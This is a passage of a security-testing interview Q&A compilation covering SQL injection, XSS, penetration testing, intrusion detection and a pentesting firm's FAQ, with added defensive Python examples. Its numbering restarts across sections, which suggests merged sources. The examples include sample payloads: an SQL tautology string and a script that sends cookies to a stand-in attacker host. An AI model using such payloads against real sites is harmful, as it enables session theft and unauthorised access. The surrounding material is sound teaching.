Ans. Security testing can be considered the most important of all types of software testing. Its main objective is to find vulnerabilities in any software-based application (web or network) and to protect its data from possible attacks or intruders.
Many applications contain confidential data that needs to be protected from being leaked. Security testing needs to be done periodically on such applications to identify threats and to take immediate action on them.
Q#2. What is a “vulnerability”?
Ans. A vulnerability can be defined as a weakness of a system through which intruders or bugs can attack the system.
If security testing has not been performed rigorously on a system, the chance of vulnerabilities increases. Patches or fixes are required from time to time to protect a system from vulnerabilities.
Q#3. What is intrusion detection?
Ans. Intrusion detection is a system that helps to determine possible attacks and deal with them. Intrusion detection includes collecting information from many systems and sources, analysing that information and finding out the possible ways of attacking the system.
Intrusion detection checks the following:
1. Possible attacks
2. Any abnormal activity
3. Auditing of the system data
4. Analysis of the different collected data, etc.
Q#4. What is “SQL injection”?
Ans. SQL injection is one of the common attack techniques used by hackers to get at critical data. Hackers look for any loophole in the system through which they can pass SQL queries that bypass the security checks and return critical data. This is known as SQL injection. It can allow hackers to steal critical data or even crash a system.
SQL injections are very critical and need to be avoided. Periodic security testing can prevent these kinds of attacks. SQL database security needs to be defined correctly, and input boxes and special characters should be handled properly.
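The answer above says that special characters in input boxes must be "handled properly". The following Python example, added here and not part of the original page, shows what that means in practice: a login query built by string concatenation beside the same query written with a parameterised statement. The in-memory SQLite table, the user names and the injection string are constructed for the demonstration; a real application would never store plaintext passwords, they are used here only to keep the SQL visible.

```python
import sqlite3
from typing import List, Tuple

# Constructed sample data: an in-memory SQLite table of users.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> List[Tuple[str, str]]:
    # The user's input is pasted into the SQL text, so a quote in the input
    # ends the string literal and the rest of the input becomes SQL syntax.
    query = (
        "SELECT username, role FROM users WHERE username = '"
        + username + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchall()


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> List[Tuple[str, str]]:
    # Parameterised query: the driver sends the values separately from the
    # SQL text, so quotes and keywords in the input are data, never syntax.
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


# Constructed test input: a classic tautology that turns the WHERE clause
# into "... AND password = '' OR '1'='1'", which matches every row.
INJECTION = "' OR '1'='1"


def demo() -> dict:
    conn = build_db()
    return {
        "normal_vulnerable": login_vulnerable(conn, "bob", "hunter2"),
        "injected_vulnerable": login_vulnerable(conn, "bob", INJECTION),
        "injected_safe": login_safe(conn, "bob", INJECTION),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

With the concatenated query the injected password returns every user, including the admin; with the parameterised query the same input matches nothing, because SQLite compares the literal string `' OR '1'='1` against the password column.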
Q#5. List the attributes of security testing.
Ans. There are the following seven attributes of security testing:
1. Authentication
2. Authorization
3. Confidentiality
4. Availability
5. Integrity
6. Non-repudiation
7. Resilience
Q#6. What is XSS or cross-site scripting?
Ans. XSS or cross-site scripting is a type of vulnerability that hackers use to attack web applications. It allows hackers to inject HTML or JavaScript code into a web page, which can steal confidential information from the cookies and return it to the hackers. It is one of the most critical and common techniques and needs to be prevented.
Q#7. What is an SSL connection and an SSL session?
Ans. An SSL (Secure Sockets Layer) connection is a transient peer-to-peer communications link; each connection is associated with one SSL session.
An SSL session can be defined as an association between client and server, generally created by the handshake protocol. It defines a set of parameters that may be shared by multiple SSL connections.
Q#8. What is “penetration testing”?
Ans. Penetration testing is a form of security testing that helps in identifying vulnerabilities in a system. A penetration test is an attempt to evaluate the security of a system by manual or automated techniques; if any vulnerability is found, the testers use that vulnerability to get deeper access to the system and find more vulnerabilities. The main purpose of this testing is to protect a system from any possible attacks.
Penetration testing can be done in two ways: white box testing and black box testing.
In white box testing all the information is available to the testers, whereas in black box testing the testers don’t have any information and test the system in a real-world scenario to find the vulnerabilities.
Q#9. Why is “penetration testing” important?
Ans. Penetration testing is important because:
1. Security breaches and loopholes in systems can be very costly, as the threat of attack is always present and hackers can steal important data or even crash the system.
2. It is impossible to protect all the information all the time. Hackers always come up with new techniques to steal important data, so it is necessary for testers to perform the testing periodically to detect possible attacks.
3. Penetration testing identifies the above-mentioned attacks, protects a system against them and helps organizations to keep their data safe.
Q#10. Name the two common techniques used to protect a password file.
Ans. Two common techniques to protect a password file are hashed passwords with a salt value, and password file access control.
Q#11. List the full names of the abbreviations related to software security.
Ans. Abbreviations related to software security are:
1. IPsec – Internet Protocol Security, a suite of protocols for securing Internet Protocol communications
2. OSI – Open Systems Interconnection
3. ISDN – Integrated Services Digital Network
4. GOSIP – Government Open Systems Interconnection Profile
5. FTP – File Transfer Protocol
6. DBA – Dynamic Bandwidth Allocation
7. DDS – Digital Data System
8. DES – Data Encryption Standard
9. CHAP – Challenge Handshake Authentication Protocol
10. BONDING – Bandwidth On Demand Interoperability Group
11. SSH – Secure Shell
12. COPS – Common Open Policy Service
13. ISAKMP – Internet Security Association and Key Management Protocol
14. USM – User-based Security Model
15. TLS – Transport Layer Security
Q#12. What is ISO 17799?
Ans. ISO/IEC 17799 was originally published in the UK and defines best practices for information security management. It has guidelines on information security for all organizations, small or big.
Q#13. List some factors that can cause vulnerabilities.
Ans. Factors causing vulnerabilities are:
1. Design flaws – loopholes in the system that can allow hackers to attack the system easily.
2. Passwords – if passwords are known to hackers, they can get at the information very easily. A password policy should be followed rigorously to minimize the risk of password theft.
3. Complexity – complex software can open the door to vulnerabilities.
4. Human error – human error is a significant source of security vulnerabilities.
5. Management – poor management of the data can lead to vulnerabilities in the system.
Q#14. List the various methodologies in security testing.
Ans. The methodologies are:
1. White Box – all the information is provided to the testers.
2. Black Box – no information is provided to the testers, and they test the system in a real-world scenario.
3. Grey Box – partial information is given to the testers, and the rest they have to find out on their own.
Q#15. List the seven main types of security testing as per the Open Source Security Testing Methodology Manual.
Ans. The seven main types of security testing as per the Open Source Security Testing Methodology Manual are:
1. Vulnerability Scanning: automated software scans a system against known vulnerabilities.
2. Security Scanning: a manual or automated technique to identify network and system weaknesses.
3. Penetration Testing: a form of security testing that helps in identifying vulnerabilities in a system.
4. Risk Assessment: analysis of the possible risks in the system. Risks are classified as Low, Medium and High.
5. Security Auditing: complete inspection of systems and applications to detect vulnerabilities.
6. Ethical Hacking: hacking done on a system to detect flaws in it rather than for personal benefit.
7. Posture Assessment: combines security scanning, ethical hacking and risk assessment to show the overall security posture of an organization.
Q#16. What are SOAP and WSDL?
Ans. SOAP (Simple Object Access Protocol) is an XML-based protocol through which applications exchange information over HTTP. Web services send XML requests in SOAP format: a SOAP client sends a SOAP message to the server, and the server responds with a SOAP message along with the requested service.
WSDL (Web Services Description Language) is an XML-formatted language used by UDDI. “Web Services Description Language describes Web services and how to access them”.
Q#17. List the parameters that define an SSL session connection.
Ans. The parameters that define an SSL session connection are:
1. Server and client random
2. Server write MAC secret
3. Client write MAC secret
4. Server write key
5. Client write key
6. Initialization vectors
7. Sequence numbers
Q#18. What is file enumeration?
Ans. This kind of attack uses forceful browsing together with URL manipulation. Hackers can manipulate the parameters in the URL string and get at critical data that is generally not open to the public, such as archived data, old versions, or data that is still under development.
Q#19. List the benefits that can be provided by an intrusion detection system.
Ans. The benefits depend on the type of intrusion detection system; there are three:
1. NIDS (Network Intrusion Detection System)
2. NNIDS (Network Node Intrusion Detection System)
3. HIDS (Host Intrusion Detection System)
Q#20. What is HIDS?
Ans. HIDS (Host Intrusion Detection System) is a system in which a snapshot of the existing system is taken and compared with the previous snapshot. If it finds that critical files were modified or deleted, an alert is generated and sent to the administrator.
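The snapshot-and-compare idea from the answer above, as an added Python example that is not code from the original page. It hashes every file under a directory, stores the result as the baseline, and on the next run reports files that were modified, deleted or added. The directory, file names and contents are constructed in a temporary folder so the example runs offline; a real HIDS would keep the baseline somewhere the monitored host cannot overwrite it.

```python
import hashlib
import os
import tempfile
from typing import Dict, List


def snapshot(root: str) -> Dict[str, str]:
    """Map every file under root (path relative to root) to its SHA-256 digest."""
    digests: Dict[str, str] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            h = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            digests[os.path.relpath(full, root)] = h.hexdigest()
    return digests


def compare_snapshots(baseline: Dict[str, str], current: Dict[str, str]) -> List[str]:
    """Return one alert line per file whose state changed since the baseline."""
    alerts: List[str] = []
    for path in sorted(baseline):
        if path not in current:
            alerts.append(f"DELETED {path}")
        elif baseline[path] != current[path]:
            alerts.append(f"MODIFIED {path}")
    for path in sorted(set(current) - set(baseline)):
        alerts.append(f"ADDED {path}")
    return alerts


def _write(root: str, name: str, content: str) -> None:
    with open(os.path.join(root, name), "w") as fh:
        fh.write(content)


def demo() -> List[str]:
    # Constructed "critical files" in a throwaway directory.
    with tempfile.TemporaryDirectory() as root:
        _write(root, "hosts", "127.0.0.1 localhost\n")
        _write(root, "passwd", "root:x:0:0:root:/root:/bin/sh\n")
        _write(root, "shadow", "root:*:19000:0:99999:7:::\n")
        baseline = snapshot(root)

        # Simulated changes between two runs of the monitor.
        _write(root, "passwd", "root:x:0:0:root:/root:/bin/sh\nextra:x:0:0::/:/bin/sh\n")  # modified
        os.remove(os.path.join(root, "shadow"))                                            # deleted
        _write(root, "new_service", "#!/bin/sh\n")                                          # added

        return compare_snapshots(baseline, snapshot(root))


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```

Hashing the content rather than comparing timestamps matters because modification times are trivially reset; the digest changes whenever the bytes do.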
Q#21. List the principal categories of SET participants.
Ans. The participants are:
1. Cardholder
2. Merchant
3. Issuer
4. Acquirer
5. Payment gateway
6. Certification authority
Q#22. Explain “URL manipulation”.
Ans. URL manipulation is a type of attack in which hackers manipulate the website URL to get critical information. The information is passed between client and server in the parameters of the query string via the HTTP GET method. Hackers can alter the information in these parameters, get authenticated on the server and steal critical data.
In order to avoid this kind of attack, security testing of URL manipulation should be done. Testers themselves can try to manipulate the URL and check for possible attacks; if any are found, they can prevent these kinds of attacks.
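What the server should do so that altering query-string parameters gains nothing, as an added Python example (not code from the original page). It contrasts a handler that trusts `user` and `role` from the URL with one that takes identity and role only from a server-side session and checks the requested record against the caller's ownership. The order records, session store and URLs are constructed for the example.

```python
from typing import Dict, Optional
from urllib.parse import parse_qs, urlparse

# Constructed data: order id -> record, with the owning user.
ORDERS: Dict[str, dict] = {
    "1001": {"owner": "alice", "total": 42.00},
    "1002": {"owner": "bob", "total": 99.00},
}

# Constructed server-side session store: session token -> identity.
# The token travels in a cookie; the identity never leaves the server.
SESSIONS: Dict[str, dict] = {
    "tok-alice": {"user": "alice", "role": "customer"},
}


def query_params(url: str) -> Dict[str, str]:
    """Return the first value of each query-string parameter."""
    return {k: v[0] for k, v in parse_qs(urlparse(url).query).items()}


def get_order_vulnerable(url: str) -> Optional[dict]:
    """Trusts user and role from the URL, so a client can rewrite either."""
    p = query_params(url)
    order = ORDERS.get(p.get("id", ""))
    if order is None:
        return None
    if p.get("role") == "admin" or order["owner"] == p.get("user"):
        return order
    return None


def get_order_safe(url: str, session_token: str) -> Optional[dict]:
    """Identity and role come from the session; the URL only says which record
    is wanted, and that request is checked against ownership."""
    session = SESSIONS.get(session_token)
    if session is None:
        return None  # not logged in
    order = ORDERS.get(query_params(url).get("id", ""))
    if order is None:
        return None  # unknown record: same answer as "forbidden", to avoid enumeration
    if session["role"] == "admin" or order["owner"] == session["user"]:
        return order
    return None


if __name__ == "__main__":
    tampered = "https://shop.example/order?id=1002&user=alice&role=admin"  # constructed
    print("vulnerable:", get_order_vulnerable(tampered))
    print("safe:      ", get_order_safe(tampered, "tok-alice"))
```

Returning the same "not found" result for a missing record and for someone else's record keeps the response from confirming which ids exist, which is the information a file-enumeration attempt (Q#18) is after.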
Q#23. What are the three classes of intruders?
Ans. The three classes of intruders are:
1. Masquerader: an individual who is not authorized on the computer but hacks the system's access control and gains access to an authenticated user's account.
2. Misfeasor: in this case the user is authenticated to use the system resources but misuses his access to the system.
3. Clandestine user: an individual who hacks the control system of the system and bypasses the system's security.
Q#24. List the components used in SSL.
Ans. The Secure Sockets Layer protocol (SSL) is used to make a secure connection between client and server computers. The components used in SSL are:
1. SSL Record protocol
2. Handshake protocol
3. Change Cipher Spec
4. Encryption algorithms
Q#25. What is port scanning?
Ans. Ports are the points through which information goes in and out of any system. Scanning the ports to find any loopholes in the system is known as port scanning. There can be some weak points in the system that hackers can attack to get critical information. These points should be identified and protected from any misuse.
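Seen from the defender's side, a port scan shows up as one source touching many distinct destination ports in a short time. The Python example below, added here and not part of the original page, parses a few constructed firewall-style log lines and flags any source that hits at least ten distinct ports within a sixty-second sliding window. The log format, the addresses and the threshold are assumptions made for the example.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple

# Constructed sample log: ISO timestamp, source, destination, destination port.
SAMPLE_LOG = """
2024-05-01T10:00:00 SRC=203.0.113.5 DST=198.51.100.10 DPT=21
2024-05-01T10:00:02 SRC=203.0.113.5 DST=198.51.100.10 DPT=22
2024-05-01T10:00:04 SRC=203.0.113.5 DST=198.51.100.10 DPT=23
2024-05-01T10:00:05 SRC=192.0.2.7 DST=198.51.100.10 DPT=443
2024-05-01T10:00:06 SRC=203.0.113.5 DST=198.51.100.10 DPT=25
2024-05-01T10:00:08 SRC=203.0.113.5 DST=198.51.100.10 DPT=53
2024-05-01T10:00:10 SRC=203.0.113.5 DST=198.51.100.10 DPT=80
2024-05-01T10:00:12 SRC=203.0.113.5 DST=198.51.100.10 DPT=110
2024-05-01T10:00:14 SRC=203.0.113.5 DST=198.51.100.10 DPT=143
2024-05-01T10:00:16 SRC=203.0.113.5 DST=198.51.100.10 DPT=443
2024-05-01T10:00:18 SRC=203.0.113.5 DST=198.51.100.10 DPT=445
this line is deliberately malformed and must be skipped
2024-05-01T10:00:20 SRC=203.0.113.5 DST=198.51.100.10 DPT=3306
2024-05-01T10:00:22 SRC=203.0.113.5 DST=198.51.100.10 DPT=3389
2024-05-01T10:00:40 SRC=192.0.2.7 DST=198.51.100.10 DPT=443
2024-05-01T10:01:10 SRC=192.0.2.7 DST=198.51.100.10 DPT=80
"""

LINE_RE = re.compile(r"^(\S+) SRC=(\S+) DST=\S+ DPT=(\d+)$")

Event = Tuple[datetime, str, int]  # (timestamp, source address, destination port)


def parse_log(text: str) -> List[Event]:
    """Parse the log, silently skipping lines that do not match the format."""
    events: List[Event] = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append((datetime.fromisoformat(m.group(1)), m.group(2), int(m.group(3))))
    return events


def detect_scans(events: List[Event], window_seconds: int = 60, threshold: int = 10) -> Dict[str, int]:
    """Return {source: max distinct ports seen inside one window} for sources over the threshold."""
    by_src: Dict[str, List[Tuple[datetime, int]]] = defaultdict(list)
    for ts, src, port in events:
        by_src[src].append((ts, port))

    flagged: Dict[str, int] = {}
    for src, hits in by_src.items():
        hits.sort()
        left = 0
        for right in range(len(hits)):
            # Slide the left edge until the window fits in window_seconds.
            while (hits[right][0] - hits[left][0]).total_seconds() > window_seconds:
                left += 1
            distinct = {port for _, port in hits[left:right + 1]}
            if len(distinct) >= threshold:
                flagged[src] = max(flagged.get(src, 0), len(distinct))
    return flagged


def demo() -> Dict[str, int]:
    return detect_scans(parse_log(SAMPLE_LOG))


if __name__ == "__main__":
    print(demo())
```

Counting distinct ports rather than raw connections is what separates a scan from a busy but legitimate client, which repeats the same one or two ports many times.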
Question 13. What Time Investment Do You Estimate For A Penetration Test?
Answer :
The time investment for a penetration test varies from case to case depending on the systems to be
tested and the individual test requirements. Usually, the time needed ranges from a few days to several
weeks. One goal of the preliminary meeting is to get enough information about the systems to be tested
to estimate the optimal length for the penetration test.
Human resources on the customer's side are usually only marginally bound. Most notably, a contact
person for questions during the exploitation phase is required.
Question 14. How Much Information Does Redteam Pentesting Need From Us?
Answer :
The type and amount of information needed varies with the kind of penetration test that is to be
conducted. The two concepts mentioned most often are blackbox and whitebox tests. Unfortunately,
those terms are not defined by a standard and can therefore mean different things, depending on who
you talk to.
RedTeam Pentesting usually recommends a whitebox test. Penetration tests performed as complete
blackbox tests always suffer from the fact that third parties might get involved without their explicit
consent. Providing technical information in a whitebox test scenario before the test starts also allows the
penetration testers to detect security vulnerabilities that are of importance to your company even faster
and more efficiently.
It should always be acted on the assumption that real, serious attackers are able to obtain the necessary
information prior to their attacks, or can procure it in time. A precise determination about what
information is necessary to conduct an efficient test is done individually for every client during a
preliminary meeting.
Question 15. What Are Blackbox And Whitebox Tests?
Answer :
A blackbox test is normally defined as a test where the penetration testers do not have any more
information than attackers without internal knowledge might have. The idea is to check how deeply
potential attackers can compromise your systems without any kind of internal information or access. All
knowledge has to be gathered with classical reconnaissance (finding as much information as possible
about the target) and enumeration (a deeper look at individual systems).
Despite the requirement of having as little information in the beginning as possible, at least a few specifications for the test have to be given, lest uninvolved third parties be targeted unintentionally. This does not pose a restriction for real attackers, but for every reputable company it should go without saying that all phases of a penetration test are only performed where explicit consent is given. This is not the case for third-party systems that would, for example, be affected by a port scan of a range of systems that presumably belong to the client the penetration test is conducted for.
In contrast, there is the whitebox test (sometimes also denoted as crystal-box test). In a whitebox test,
the penetration testers already have internal knowledge about the target systems (for example network
plans or a web application's source code) and possibly various access permissions. The latter could be an
unprivileged user account to the company network, as it is available to employees, or login credentials
for a web application like any normal customer would have.
This allows testing of the extent to which users with access to a system can misuse their permissions. Additionally, internal information may be provided that is also available to every staff member of the company. This can be information about internal systems like web servers, mail servers, LDAP servers etc., but also, for example, organisational structures like employees' responsibilities and positions in the company. If only selected parts of the information are divulged, this kind of test is also often called a graybox test.
Question 16. Why Should Not Only The Network Perimeter Be Tested, But Also The Internal Network?
Answer :
If your company's network is sufficiently hardened at the perimeter systems and it was not possible to
successfully compromise it during a perimeter test, it still makes sense to additionally conduct an
internal test. Just because the perimeter systems are sufficiently secured, it does not mean that the
same precautions are taken on the internal network. Most of the time, too little security is done on the
internal network, as it is supposedly only accessible by trustworthy persons. Especially in larger
corporations though, not every employee needs the same access permissions.
The intern does not need to have the same access level as the CEO. It is therefore a severe problem if a
security vulnerability appearing in the future that allows access to the internal network eliminates all
safety precautions. If the financial incentive is big enough, it should also be no problem for attackers
(competitors, business rivals) to either bribe one of your staff members or infiltrate your organization
with somebody reporting back to them with all the data that is supposedly well guarded if seen from the
outside.
Question 17. What Types Of Systems Does Redteam Pentesting Test?
Answer :
RedTeam Pentesting tests all kinds of systems. Frequently, the security vulnerabilities that matter the most are independent of the system's technology, making it possible to successfully test even previously unknown types of systems. Additionally, it goes with the job of being a penetration tester to have the ability to quickly adapt to new situations and systems.
Additionally, RedTeam Pentesting's service is not limited to the classic network- or web application
penetration test. Newly developed hardware and other products are also tested, as well as security
concepts only existing as a draft at the time of testing. In some particular cases, a penetration test
conducted in response to the detection of a security incident can help in identifying the vulnerabilities
exploited and in fixing them in a timely manner.
Question 18. Can Any Harm Be Done To Our Productive Systems During The Test?
Answer :
Unlike real attackers, RedTeam Pentesting pays great attention to a customer's production systems, so as
to not interrupt them. We always go to the greatest extent to leave all systems unharmed in a
penetration test. Attacks where the risk of a system failure is especially high are only performed with the
client's explicit consent.
All in all, it is never possible to completely rule out that a production system crashes in a penetration
test. To be able to get hold of someone as fast as possible in such a situation, emergency telephone
numbers are exchanged prior to the test.
Question 19. Are Denial-of-service Attacks Also Tested?
Answer :
Denial-of-service (DoS) attacks are usually only examined if it seems to be possible to put a system's
availability at risk with very small effort. This can for example be a misconfiguration or a program
error (say, if a system crashes when it gets sent an overly long request). Attacks like this will only be
performed after an explicit agreement is provided, to verify if the attack is indeed possible.
On the other hand, attacks that try to saturate the bandwidth a company has at its disposal are
usually not tested, as this is always possible for attackers with sufficient resources and will also affect
third-party systems. Distributed denial-of-service attacks, that usually involve hundreds, if not
thousands, of zombie systems (systems that were compromised and can now be remotely controlled)
cannot be simulated realistically.
Question 20. Does Redteam Pentesting Do Social Engineering?
Answer :
Penetration tests may include social engineering techniques. These techniques are not without controversy though. More detailed information about the problems occurring with social engineering and penetration tests is available under exploitation. One safety measure against social engineering attacks can be training for your employees.
Question 21. What Happens To Confidential Data Redteam Pentesting Gathers During The Penetration Test?
Answer :
RedTeam Pentesting commits itself to absolute secrecy regarding your confidential data. A non-disclosure agreement (NDA) determining that RedTeam Pentesting treats a client's data as confidential is already part of every contract. All customer data, including information that is used to prepare a first quotation, is subject to the same obligation to confidentiality. At the end of a penetration test, all data and possible storage media is either securely destroyed or handed back to the client.
Question 22. Are The Results Written Down In A Report?
Answer :
Every client gets a detailed report at the end of a penetration test. A typical report includes a non-
technical executive summary of the results, to give a short and precise overview of the current status,
followed by a more extensive technical explanation for administrators, developers or other technical
staff.
The individual problems enumerated in the report are separated into a detailed description, a risk
analysis and proposed solutions, to directly give suggestions for improvement.
Question 23. What Other Products And Services Does Redteam Pentesting Offer?
Answer :
RedTeam Pentesting specialises in penetration tests and does not offer any other services. In particular,
no products or services are sold after a penetration test, to guarantee independent and objective test
results. The specialisation also ensures that RedTeam Pentesting's employees have a lot of experience
and expert knowledge for conducting penetration tests.
Question 6. If You Were A Site Administrator Looking For Incoming Csrf Attacks, What Would You Look
For?
Answer :
This is a fun one, as it requires them to set some ground rules. Desired answers are things like, “Did we
already implement nonces?”, or, “That depends on whether we already have controls in place…”
Undesired answers are things like checking referrer headers, or wild panic.
Question 7. What’s The Difference Between Http And Html?
Answer :
Obviously the answer is that one is the networking/application protocol and the other is the markup
language, but again, the main thing you’re looking for is for him not to panic.
Question 8. How Does Http Handle State?
Answer :
It does not, of course. Not natively. Good answers are things like “cookies”, but the best answer is that
cookies are a hack to make up for the fact that HTTP doesn’t do it itself.
Question 10. What’s The Difference Between Stored And Reflected Xss?
Answer :
Stored is on a static page or pulled from a database and displayed to the user directly. Reflected
comes from the user in the form of a request (usually constructed by an attacker), and then gets run
in the victim’s browser when the results are returned from the site.
Question 11. What Are The Common Defenses Against Xss?
Answer :
Input Validation/Output Sanitization, with focus on the latter.
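The "focus on output sanitization" in the answer above, and the cookie-stealing script injection described in Q#6 earlier on the page, as one added Python example (not code from the original page). Stored and reflected XSS differ in where the payload comes from, but both end at the same sink, so the same fix applies: encode every untrusted value for the HTML context it lands in, and validate values that go into a URL context. The comment-rendering functions, the attribute name and the sample inputs are assumptions made for the example.

```python
import html
from urllib.parse import urlparse


def render_comment_vulnerable(author: str, text: str) -> str:
    """Raw interpolation: any markup in the input becomes part of the page."""
    return f'<p class="comment" data-author="{author}">{text}</p>'


def render_comment_safe(author: str, text: str) -> str:
    """Encode each value for its context: quoted attribute and element body.

    quote=True also escapes the two quote characters, which is what prevents
    breaking out of the data-author="..." attribute.
    """
    return (
        f'<p class="comment" data-author="{html.escape(author, quote=True)}">'
        f'{html.escape(text, quote=False)}</p>'
    )


def safe_href(url: str) -> str:
    """Input validation for a URL-context value: allow http(s) links only.

    Encoding alone cannot make a javascript: URL safe in an href, so the
    scheme is checked first and anything else is replaced with '#'.
    """
    parsed = urlparse(url.strip())
    if parsed.scheme.lower() in ("http", "https") and parsed.netloc:
        return html.escape(url, quote=True)
    return "#"


# Constructed sample inputs: one stored-style payload in the comment body and
# one attribute-breakout attempt in the author field.
SAMPLE_TEXT = "<script>document.location='https://evil.example/?c='+document.cookie</script>"
SAMPLE_AUTHOR = 'x" onmouseover="alert(1)'


def demo() -> dict:
    return {
        "vulnerable": render_comment_vulnerable(SAMPLE_AUTHOR, SAMPLE_TEXT),
        "safe": render_comment_safe(SAMPLE_AUTHOR, SAMPLE_TEXT),
        "link_blocked": safe_href("javascript:alert(1)"),
        "link_allowed": safe_href("https://example.com/a?b=1&c=2"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Whether the payload came from the database (stored) or from the request (reflected) makes no difference to `render_comment_safe`; the browser receives `&lt;script&gt;` as text to display, not an element to run. Marking session cookies `HttpOnly` is a complementary control that keeps `document.cookie` from exposing them even if encoding is missed somewhere.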